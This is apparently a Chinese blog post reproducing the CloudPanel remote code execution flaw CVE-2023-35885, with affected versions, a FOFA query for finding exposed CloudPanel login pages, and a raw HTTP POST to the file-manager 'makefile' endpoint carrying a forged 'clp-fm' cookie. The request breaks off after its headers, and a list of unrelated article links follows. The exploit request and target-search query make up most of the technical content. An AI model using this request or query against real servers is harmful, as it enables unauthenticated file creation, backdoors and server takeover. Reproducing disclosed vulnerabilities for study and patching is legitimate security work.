CloudPanel RCE漏洞复现(CVE-2023-35885)

0x01 产品简介

CloudPanel 是一个基于 Web 的控制面板或管理界面,旨在简化云托管环境的管理。它提供了一个集中式平台,用于管理云基础架构的各个方面,包括虚拟机 (VM)、存储、网络和应用程序。

0x02 漏洞概述

由于2.3.1 之前的 CloudPanel 具有不安全的文件管理器 cookie 身份验证。未经身份验证的攻击者可以利用此问题在服务器上创建任意文件,创建PHP后门文件可远程代码执行,并且获取服务器权限。

0x03 影响范围

CloudPanel >= v2.0.0 && <= v2.3.0

0x04 复现环境

FOFA:title=="CloudPanel | Log In"

0x05 漏洞复现

创建文件

POST /file-manager/backend/makefile HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0

相关推荐

  1. 漏洞】NotificationX SQL注入漏洞(CVE-2024-1698)

    2024-01-20 07:20:02       22 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-01-20 07:20:02       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-01-20 07:20:02       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-01-20 07:20:02       19 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-01-20 07:20:02       20 阅读

热门阅读

  1. UI -- UniApp

    2024-01-20 07:20:02       30 阅读
  2. Webpack5入门到原理11:处理 js 资源

    2024-01-20 07:20:02       31 阅读
  3. C语言再学习 -- C语言搭建TCP服务器/客户端

    2024-01-20 07:20:02       39 阅读
  4. linux Vim编辑器使用以及文件权限修改,kill process

    2024-01-20 07:20:02       27 阅读
  5. Webpack5入门到原理14:生产模式介绍

    2024-01-20 07:20:02       32 阅读
  6. 【机器学习】TensorFlowLite安装和模型训练

    2024-01-20 07:20:02       40 阅读
  7. Cryptography and Coding Theory

    2024-01-20 07:20:02       28 阅读
  8. 【设计模式 创建型】单例模式

    2024-01-20 07:20:02       35 阅读
  9. python获取线程名称和传递参数,数据共享

    2024-01-20 07:20:02       32 阅读